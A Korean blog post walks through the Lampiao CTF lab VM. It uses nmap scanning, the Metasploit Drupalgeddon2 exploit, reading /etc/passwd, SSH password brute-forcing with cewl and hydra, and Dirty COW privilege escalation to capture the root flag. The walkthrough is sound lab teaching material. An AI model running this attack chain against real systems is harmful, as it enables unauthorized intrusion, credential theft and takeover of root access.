나만의 연습장

LamPiao - CTF 문제 풀이 본문

CTF

LamPiao - CTF 문제 풀이

My-Berr 2018. 11. 4. 16:40

!!!경고!!!

본 게시물에는 해킹 기법에 관련한 정보가 포함되어 있습니다.

이를 사용하여 악용할 시에는 법적 문제가 발생할 수 있으며

공격으로 인한 사고에 대해서 작성자는 절대 책임지지 않습니다.


이 페이지를 열함하였다는 것은 이에 동의한  것으로 간주합니다.


01CTF

1-1. 개요

  • 선택한 CTF를 들어가 보면 root를 얻어라라고 한다.
  • 밑에 Download를 받는다.  


01 CTF

1-2. 실습 환경 구축

  • 위에서 받았던 파일의 압축을 VM 폴더에 풀어 놓는다.
  • Lampiao.ovf 파일을 선택 하여 VMware로 파일을 열어본다. 



실습 환경 구축

  • firewall
  • Kali
  • Lampiao 

 


02 장 정보 수집

2-1. IP 찾기 (Kali)

  • # netdiscover 라는 명령어를 사용
  • 192.168.10.135 라는 IP를 찾을 수 있다.



 

2-2. 포트번호와 서비스 확인

  • # nmap -sV -T5 -p 1-65535 192.168.10.135 명령어 사용
  • 포트 번호 22, 80, 1898 확인
  • 서비스 ssh, http 확인




02 장 정보 수집

2-3. http 홈페이지 확인

  • 열려있는 80포트 접속

 


 

 

 

02 장 정보 수집

2-3 http 홈페이지 확인

  • 열려있는 1898포트 접속
  • 로그인 페이지와 Drupal(드루팔)에 의해 만들어진 것을 알 수 있다.(Powered by Durpal)

 



03Drupal Attack

3-1. msfconsole

  • msfconsole 접속
  • search Drupal 검색

 

  • exploit/unix/webapp/drupal_drupalgeddon2를 선택하여 공격을 한다.


 

 

3Drupal Attack

3-1. msfconsole

 

  • RHOSTRPORT를 설정해준다.
  • exploit으로 공격을 한다.
  • 192.168.10.135에 접속을 확인 할 수 있다.

 




 

3Drupal Attack

3-2. 정보 수집

  • getuid로 자신을 확인한다.
  • cat /etc/passwd로 사용자들을 확인한다.

       

 

 

04 장 패스워드 찾기

4-1. cewl

(TERM2)

  • 위에 명령어로 패스워드 크래커에 사용할 수 있는 단어 목록을 반환한다.



04 장 패스워드 찾기

4-2. hydra

(TERM2)

  • hydra -l tiago -P wordlist1.txt 192.168.10.135 ssh
  • 위에 명령어로 tiago의 사용자의 패스워드를 크래킹 한다.
  • 패스워드 Virgulino 확인

 

 

 

05Lampiao 취약점 찾기

5-1. 정보 수집

 

  • cat /etc/&release 로 정보 수집 ( ubuntu 14.04.5 )
  • uname -a 로 정보 수집 ( Linux lampiao 4.40-31-generic )

 



    

 

 

5Lampiao 취약점 찾기

5-2. exploit-db

 

  • https://www.exploit-db.com 홈페이지에 들어가서 위에서 수집한 정보를 입력하여 알맞은 공격 툴을 선택한다.
  • dirtycow, 2016-11-27을 선택하였다.

 


 

 

  • 칼리에 다운받은 공격툴을 scp 명령어로 tiago 홈 디렉토리에 저장한다.
  • scp -r root@192.168.10.50:/root/test/40847.cpp /home/tiago
  • 40847.cpp을 컴파일한다.

 


 

 

6root Flag 찾기

6-1. Flag 찾기

 

  • ./dcow -s 로 명령을 실행한다.
  • 위에 명령어를 사용하면 root사용자로 변한 것을 확인 할 수 있다.
  • ls 명령어를 사용하면 flag.txt를 찾을 수 있다.
  • cat 명령어로 보면 rootflag를 찾을 수 있다.



Comments